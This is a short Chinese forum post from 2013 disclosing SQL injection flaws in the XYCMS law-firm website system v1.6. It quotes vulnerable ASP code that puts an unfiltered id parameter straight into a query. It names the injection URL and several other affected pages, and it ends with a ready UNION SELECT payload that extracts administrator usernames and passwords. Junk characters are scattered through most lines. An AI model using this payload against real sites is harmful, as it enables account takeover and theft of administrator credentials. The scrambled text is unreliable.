前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似' O; R# d& \3 [' q. e% N+ f) T0 S
5 f5 z; P9 Y7 d" f9 y
淫荡分割线
) O7 j) H! L5 r) _--------------------------------------------------------/ \ R! ?5 N4 i7 |+ _, t# |9 O V: d
4 [% {7 W3 \& Q" t! U) ?
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测): g) V4 i+ L! a$ J
源码地址:http://down.chinaz.com/soft/29233.htm
0 r2 j; O6 m E+ x" o. X
; D9 }* a1 }' u- Q* k- I漏洞文件:shownews.asp
% o- X: x/ G3 }6 ?0 O" {: N漏洞代码:7-13行
/ U) T/ b; Q8 Z @: d P* t/ \- w
% W" {/ u# H3 N7 ^' z% P6 t) G9 G + }2 s6 I$ S) C1 ?% Z, t) F
<% 9 N2 h# K2 l. D$ F1 I
id=request.QueryString("id")" G$ A$ M: T/ M- m( ?/ v' ^6 c2 K
" p3 \8 ~. t$ K) f$ rset snews=server.createobject("adodb.recordset") ! c! K& H9 m: X5 k
exec="select * from [news] where id="&id
6 k$ W% S0 ?$ W5 M5 Nsnews.open exec,conn,1,1
/ G( g4 ?# s# u5 O% q( E: k4 Y; K%>
8 N5 u [6 c" p* r
6 W2 `; ]. t3 P
, A+ i4 f/ J; w$ t. ]什么过滤都没有 直造成注入
; O! i' O8 f+ L' I! E* C, |
/ t, i5 _2 I: A$ J) x4 N/ n8 d注入点:http://127.0.0.1:99/shownews.asp?id=xx
0 o' K4 D+ U! p7 H+ k
8 Q; O1 y3 B. m: i其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找- T N0 J, S" B
: R" }) i: u: l6 t1 T6 U
/ G5 J5 W# K0 V+ ^4 ]1 {exp: union select 1,admin,password,4,5,7 from admin_user
6 O) Y4 Q, a1 O& Q G; Q3 i0 A) [9 @) @& @& }! Y
|
发表于 2013-4-4 17:28:12
收藏
分享
支持
反对